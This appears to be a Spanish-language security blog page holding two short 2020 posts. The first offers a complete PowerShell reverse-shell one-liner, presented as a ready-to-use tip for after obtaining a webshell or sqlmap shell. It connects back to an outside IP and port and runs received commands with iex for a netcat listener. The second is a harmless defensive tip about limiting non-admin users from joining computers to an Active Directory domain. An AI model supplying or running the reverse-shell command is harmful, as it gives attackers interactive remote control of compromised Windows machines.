lunes, 24 de febrero de 2020

Tips & Tricks: levantar una consola powershell remota desde cmd

Estimados amigos de inseguros !!!

Si en algún momento de tu vida, por ejemplo, si consigues una webshell, o una shell con sqlmap y necesitas levantar una shell inversa powershell, este es tu código xD. Solo tienes que lanzarlo y poner un netcat en el equipo destino a la escucha...

Espero que te sirva !!!  gracias por leerme.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ip',puerto);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

miércoles, 19 de febrero de 2020

Tips & tricks: No permitir a usuarios no admin meter equipos al dominio

Estimados amigos de Inseguros !!!

Un tip defensivo muy rápido y algo viejuno, pero que no se suele usar.

Imagina un entorno Active Directory en que los equipos pertenecen a UO para controlar cierto comportamiento, como el firewall local o una política de comunicaciones IPSEC.

Qué pasa si doy de alta un equipo, siendo un usuario plano, y no meto ese equipo en la UO que recibe la GPO? Recuerda que un usuario por defecto, sin ser admin, puede meter 10 equipos al dominio...

Pues con este sencillo click, puedes configurar este comportamiento para evitarlo:
https://support.microsoft.com/en-us/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain

Espero que lo uses !!!

Gracias por leerme !!!